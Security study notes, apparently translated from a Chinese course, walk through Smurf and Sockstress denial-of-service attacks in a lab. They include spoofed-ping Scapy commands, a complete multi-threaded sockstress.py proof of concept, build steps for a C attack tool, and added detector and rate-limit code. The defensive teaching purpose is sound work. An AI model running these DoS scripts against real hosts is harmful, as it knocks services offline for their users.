【安全牛 Study Notes】Smurf Attack and Sockstress
Source: Internet | Editor: 程序博客网 | Date: 2024/05/30 23:01
Smurf attack
Among the oldest DDoS techniques (late 1990s)
- Send ICMP echo request (ping) packets with a forged source address to a broadcast address
- Every host on the LAN answers the forged source address, so one packet yields as many replies as there are responding hosts
- Almost ineffective against modern systems: hosts ignore echo requests addressed to a broadcast by default (Linux: net.ipv4.icmp_echo_ignore_broadcasts = 1), and routers no longer forward directed broadcasts (Cisco IOS: no ip directed-broadcast has been the default since 12.0)
Scapy
- i=IP()
- i.dst="1.1.1.255"
- p=ICMP()
- p.display()
- r=(i/p)
- send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
msfadmin@metasploit:~$ ifconfig
192.168.1.119
root@K:~# scapy
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.3.2)
>>> i=IP()
>>> i.src="192.168.1.119"
>>> i.dst="192.168.1.255"
>>> i.display()
###[ IP ]###
version= 4
ihl= None
tos= 0x0
len= None
id= 1
flags=
frag= 0
ttl= 64
proto= tcp
chksum= None
src= 192.168.1.119
dst= 192.168.1.255
\options\
>>> p=ICMP()
>>> p.display()
###[ ICMP ]###
type=echo-request
code=0
chksum=None
id=0x0
seq=0x0
>>> send(i/p)
.
Sent 1 packets
>>> r=send(i/p)
.
Sent 1 packets
>>> r.display()
Traceback (most recent call last):
File "<console>", line 1, in <module>
AttributeError: 'NoneType' object has no attribute 'display'
(send() only transmits and returns None; to send and capture the reply use sr1(i/p), which returns the first answer)
>>> send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
msfadmin@metasploit:~$ sudo tcpdump -i eth0
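The packet the Scapy session above builds, and the check a defender would run on the receiving LAN, as an added example (it is not part of the original notes and not Scapy's own code): it builds the IPv4/ICMP echo request by hand with correct checksums, parses it back, and flags echo requests aimed at a subnet's directed broadcast. The addresses (192.168.1.119 as the spoofed victim, 192.168.1.0/24 as the amplifier network) and the sample capture are constructed for the example; send_raw() is the only part that touches the network and needs root.

```python
import ipaddress
import socket
import struct


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over 16-bit words (IP and ICMP headers)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(src: str, dst: str, ident: int = 0, seq: int = 0,
                       payload: bytes = b"", ttl: int = 64) -> bytes:
    """IPv4 + ICMP echo request. `src` is whatever the caller claims: for a
    Smurf packet it is the victim's address and `dst` a directed broadcast."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 1, 0, ttl, 1, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack("!H", inet_checksum(ip)) + ip[12:]
    return ip + icmp


def parse_ipv4_icmp(pkt: bytes):
    """Decode the IPv4 header and, for protocol 1, the ICMP header.
    Returns None for anything that is not a well-formed IPv4 packet."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    _, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    info = {
        "src": str(ipaddress.IPv4Address(src)),
        "dst": str(ipaddress.IPv4Address(dst)),
        "ttl": ttl, "proto": proto,
        "ip_checksum_ok": inet_checksum(pkt[:ihl]) == 0,  # sum incl. checksum field is 0
    }
    if proto == 1 and len(pkt) >= ihl + 8:
        body = pkt[ihl:total_len]
        itype, icode, _, iid, iseq = struct.unpack("!BBHHH", body[:8])
        info.update(icmp_type=itype, icmp_code=icode, icmp_id=iid, icmp_seq=iseq,
                    icmp_checksum_ok=inet_checksum(body) == 0)
    return info


def find_smurf_triggers(packets, local_net: str):
    """Defender-side check: echo requests aimed at our subnet's directed
    broadcast (or the limited broadcast). The source address of each hit is
    the real victim, because that is where every host's reply goes."""
    bcast = str(ipaddress.ip_network(local_net).broadcast_address)
    hits = []
    for pkt in packets:
        p = parse_ipv4_icmp(pkt)
        if p and p["proto"] == 1 and p.get("icmp_type") == 8 \
                and p["dst"] in (bcast, "255.255.255.255"):
            hits.append((p["src"], p["dst"]))
    return hits


def send_raw(pkt: bytes) -> None:
    """Transmit a hand-built packet (root only). On Linux IPPROTO_RAW implies
    IP_HDRINCL, so the IP header built above goes out as-is, spoofed source included."""
    dst = parse_ipv4_icmp(pkt)["dst"]
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.sendto(pkt, (dst, 0))


if __name__ == "__main__":
    # Constructed lab traffic: the victim is 192.168.1.119, the broadcast of
    # 192.168.1.0/24 is the amplifier; the third packet is an ordinary unicast ping.
    capture = [
        build_echo_request("192.168.1.119", "192.168.1.255", ident=0x1234, seq=1),
        build_echo_request("192.168.1.119", "192.168.1.255", ident=0x1234, seq=2),
        build_echo_request("192.168.1.116", "192.168.1.119"),
    ]
    for victim, bcast in find_smurf_triggers(capture, "192.168.1.0/24"):
        print("smurf trigger: spoofed src %s -> broadcast %s" % (victim, bcast))
```

Run the detector over packets pulled from a pcap of the LAN segment; with the host and router defaults mentioned in the notes it will still see the trigger packets, but no amplification follows because the hosts discard them. Only use send_raw() against a lab network you own.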
Sockstress
Discovered in 2008 by Jack C. Louis (with Robert E. Lee, Outpost24); tracked as CVE-2008-4609
A denial-of-service attack against TCP services
- Exhausts resources on the targeted system
- Establishes a large number of socket connections with the target
- Completes the three-way handshake, but the final ACK advertises a window size of 0 (the client accepts no data)
- Cheap for the attacker (CPU, memory, bandwidth)
- Asymmetric attack: a single machine can deny service to a well-provisioned server
- Abuses the flow control TCP implements through the receive window: the server must keep each socket, its buffers and any queued response data alive while it probes a window that never opens
root@K:~# cp /media/sf_D_DRIVE/sockstress.py .
----------------------------------------------------------------------
[sockstress.py]
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Sockstress PoC: complete the three-way handshake with a zero receive window and
# leave the connection idle, so the target keeps the socket and its buffers alive.
from scapy.all import IP, TCP, sr1, send
from time import sleep
import threading
import logging
import os
import random
import signal
import sys

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

if len(sys.argv) != 4:
    print("Usage: ./sockstress.py [target IP] [port] [threads]")
    print("Example: ./sockstress.py 10.0.0.5 21 20  ## make sure the target port is open")
    sys.exit(1)

target = str(sys.argv[1])
dstport = int(sys.argv[2])
threads = int(sys.argv[3])

## Attack function
def sockstress(target, dstport):
    while True:
        try:
            x = random.randint(1024, 65535)
            # SYN from a random source port; sr1() waits up to 1 s for the SYN/ACK
            response = sr1(IP(dst=target)/TCP(sport=x, dport=dstport, flags='S'),
                           timeout=1, verbose=0)
            if response is None or TCP not in response \
                    or (response[TCP].flags & 0x12) != 0x12:   # not a SYN/ACK
                continue
            # Final ACK of the handshake with window=0 plus 2 bytes of payload:
            # the connection reaches ESTABLISHED, but the client never accepts data
            send(IP(dst=target)/TCP(dport=dstport, sport=x, window=0, flags='A',
                                    seq=response[TCP].ack,
                                    ack=response[TCP].seq + 1)/b'\x00\x00', verbose=0)
        except Exception:
            pass

## Stop function: remove the iptables rule again on Ctrl+C
def shutdown(signum, frame):
    print('Restoring iptables rules')
    os.system('iptables -D OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
    sys.exit(0)

## Add an iptables rule: the local kernel knows nothing about these raw-socket
## connections and would answer every SYN/ACK with a RST, tearing them down
os.system('iptables -A OUTPUT -p tcp --tcp-flags RST RST -d ' + target + ' -j DROP')
signal.signal(signal.SIGINT, shutdown)

## Multi-threaded attack
print("\nAttack in progress... press Ctrl+C to stop")
for _ in range(threads):
    threading.Thread(target=sockstress, args=(target, dstport), daemon=True).start()

## Run forever
while True:
    sleep(1)
----------------------------------------------------------------------
root@K:~# ./sockstress.py
WARNING: No route found for IPv6 destination :: (no default route?)
Usage: ./sockstress.py [target IP] [port] [threads]
Example: ./sockstress.py 10.0.0.5 21 20  ## make sure the target port is open
root@K:~# ./sockstress.py 192.168.1.119 21 200
WARNING: No route found for IPv6 destination :: (no default route?)
Attack in progress... press Ctrl+C to stop
root@K:~# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~# ifconfig
192.168.1.116
root@K:~# ping 192.168.1.119
root@K:~# ifconfig
10.0.2.15
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB
msfadmin@metasploit:~$ sudo netstat -pantu | grep ESTAB | wc -l
654
msfadmin@metasploit:~$ free -m   # memory usage
root@K:~# nc 192.168.1.119 21
Sockstress
Python attack script
- ./sockstress.py 1.1.1.1 21 200
C attack tool
- http://github.com/defuse/sockstress
- gcc -Wall -c sockstress.c
- gcc -pthread -o sockstress sockstress.o
- ./sockstress 1.1.1.1:80 eth0
- ./sockstress 1.1.1.1:80 eth0 -p payloads/http
Firewall rule (keeps the local kernel from resetting the raw-socket connections)
- iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
root@K:~/sockstress-master# gcc -Wall -c sockstress.c
root@K:~/sockstress-master# gcc -pthread -o sockstress sockstress.o
root@K:~/sockstress-master# ./sockstress
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
[!] Too few arguments
Usage: ./sockstress <ip>:<port> <interface> [-p payload] [-d delay]
<ip> Victim IP address
<port> Victim port
<interface> Local network interface (e.g. eth0)
-p payload File containing data to send after connecting
Payload can be at most 1000 bytes
-d delay Microseconds between SYN packets (default: 10000)
-h Help menu
**You must configure your firewall to drop TCP reset packets sent to <ip>**
root@K:~/sockstress-master# ./sockstress 192.168.1.119:21 eth0 -p payloads/
dns_a dns_axfr http smtp
root@K:~/sockstress-master# ./sockstress 192.168.1.119:21 eth0 -p payloads/http
root@K:~/sockstress-master# cat payloads/
dns_a dns_axfr http smtp
root@K:~/sockstress-master# cat payloads/dns_axfr
root@K:~/sockstress-master# cat payloads/http
root@K:~/sockstress-master# cat payloads/smtp
HELO gmail.com
MAIL FROM: foo@gmail.com
RCPT TO: victiom@victim-domain.com
DATA
Subject: AAAAAAAAAAAAA
BBBBBBBBBBBBBBBBBBB
.
QUIT
root@K:~/sockstress-master# ./sockstress 192.168.1.119:21 eth0 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
^C SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 1333
root@K:~/sockstress-master# iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 192.168.1.119 -j DROP
root@K:~/sockstress-master# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DROP tcp -- anywhere 192.168.1.119 tcp flags:RST/RST
root@K:~/sockstress-master# ./sockstress 192.168.1.119:21 eth0 -p payloads/http
SOCKSTRESS - CVE-2008-4609 | havoc@defuse.ca
[+] Sending packets from eth0 (192.168.1.116)
[+] Attacking: 192.168.1.119:80
[+] SENT: syn: 1333 ack: 133 RECV: synack: 1333 ack: 0 rst: 0
(Without the rule the RST counter was 1333: the attacker's own kernel, which knows nothing about connections opened over a raw socket, answers every SYN/ACK with a RST and tears the connection down before the zero-window ACK can hold it open. With the rule in place the counter drops to 0.)
Sockstress
Countermeasures
- Sockstress is still an effective DoS technique today
- Because a full three-way handshake is completed, SYN cookies offer no protection
- The fundamental defense is a whitelist (impractical)
- Compromise: limit the number of new TCP connections per source IP per unit of time
Block any address that opens 10 or more connections to port 80 within 30 seconds:
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP
(-I inserts at the top of INPUT, so the DROP rule ends up ahead of --set; --set does not terminate rule processing, so either order works. On current kernels -m conntrack --ctstate NEW is the equivalent of -m state --state NEW, and a --hitcount above 20 needs the xt_recent ip_pkt_list_tot module parameter raised.)
The rules above do nothing against a distributed attack: each source stays below the threshold
msfadmin@metasploit:~$ sudo iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
msfadmin@metasploit:~$ sudo iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP
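A defender-side view of the ESTABLISHED-socket check run on the Metasploitable box above and of the per-IP rate limit, as an added example (not from the notes and not iptables code): it groups a netstat-style listing by peer address, and models the two recent-module rules to show why a single source is cut off from its tenth connection on while a distributed attacker that keeps every source below the hitcount is never dropped. The netstat sample, its Send-Q values and the thresholds are constructed for the example; RecentLimiter approximates xt_recent's bookkeeping rather than reproducing it.

```python
import re
from collections import defaultdict, deque

# Constructed sample in the layout of `netstat -pantu` (not a real capture):
# proftpd holds several ESTABLISHED sockets to one peer, each with its banner
# stuck in Send-Q because the peer advertised a zero receive window.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      4821/proftpd
tcp        0     25 192.168.1.119:21        192.168.1.116:41235     ESTABLISHED 4821/proftpd
tcp        0     25 192.168.1.119:21        192.168.1.116:41236     ESTABLISHED 4821/proftpd
tcp        0     25 192.168.1.119:21        192.168.1.116:41237     ESTABLISHED 4821/proftpd
tcp        0      0 192.168.1.119:22        10.0.0.7:55120          ESTABLISHED 3100/sshd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           1022/dhclient
""".splitlines()

NETSTAT_RE = re.compile(
    r"^tcp6?\s+(?P<recvq>\d+)\s+(?P<sendq>\d+)\s+(?P<local>\S+):(?P<lport>\d+|\*)"
    r"\s+(?P<peer>\S+):(?P<pport>\d+|\*)\s+(?P<state>[A-Z_]+)")


def established_by_peer(lines):
    """Group ESTABLISHED sockets by peer address: connection count plus the
    bytes the server could not deliver (Send-Q), which is what a zero-window
    client leaves behind on every socket it holds open."""
    stats = defaultdict(lambda: {"conns": 0, "sendq": 0})
    for line in lines:
        m = NETSTAT_RE.match(line.strip())
        if not m or m.group("state") != "ESTABLISHED":
            continue
        peer = m.group("peer")
        stats[peer]["conns"] += 1
        stats[peer]["sendq"] += int(m.group("sendq"))
    return dict(stats)


def suspicious_peers(stats, min_conns=100):
    """Peers holding at least `min_conns` established sockets (the threshold is
    a tuning assumption; a legitimate client rarely needs more than a handful)."""
    return sorted(p for p, s in stats.items() if s["conns"] >= min_conns)


class RecentLimiter:
    """Software model of the two iptables rules from the notes:
         -m recent --set                                -> record the source's timestamp
         -m recent --update --seconds S --hitcount N -j DROP
                                                        -> drop once N timestamps from
                                                           that source fall within S seconds
    An approximation of xt_recent's bookkeeping, not a reimplementation."""

    def __init__(self, seconds=30, hitcount=10):
        self.seconds = seconds
        self.hitcount = hitcount
        self.seen = defaultdict(deque)

    def new_connection(self, ts, src):
        """Return True if a NEW connection from `src` at time `ts` is dropped."""
        stamps = self.seen[src]
        while stamps and ts - stamps[0] > self.seconds:
            stamps.popleft()                  # aged out of the --seconds window
        stamps.append(ts)                     # --set
        return len(stamps) >= self.hitcount   # --update --hitcount


def simulate(limiter, events):
    """events: iterable of (timestamp, src_ip) for NEW connections.
    Returns (accepted, dropped)."""
    accepted = dropped = 0
    for ts, src in events:
        if limiter.new_connection(ts, src):
            dropped += 1
        else:
            accepted += 1
    return accepted, dropped


# Constructed traffic: one attacker running ./sockstress.py <target> 21 200 ...
SINGLE_SOURCE = [(0.005 * i, "192.168.1.116") for i in range(200)]
# ... versus 200 sources that each open 9 connections, all below the hitcount
DISTRIBUTED = [(0.005 * i, "10.0.%d.%d" % (i // 256, i % 256))
               for i in range(200) for _ in range(9)]

if __name__ == "__main__":
    stats = established_by_peer(SAMPLE_NETSTAT)
    print("established sockets per peer:", stats)
    print("suspicious (>= 2 conns):", suspicious_peers(stats, min_conns=2))
    print("single source  (accepted, dropped):", simulate(RecentLimiter(), SINGLE_SOURCE))
    print("distributed    (accepted, dropped):", simulate(RecentLimiter(), DISTRIBUTED))
```

Feed established_by_peer() the output of `netstat -pantu` (or `ss -tanp`, whose columns line up the same way) on the victim: a peer with hundreds of ESTABLISHED sockets that all carry unsent data in Send-Q is the Sockstress signature, and it is what the `grep ESTAB | wc -l` count above collapses into a single number. The simulation makes the last bullet concrete: the per-IP rule stops the one-machine attack after nine connections, and does nothing once the same 1800 sockets arrive from 200 addresses.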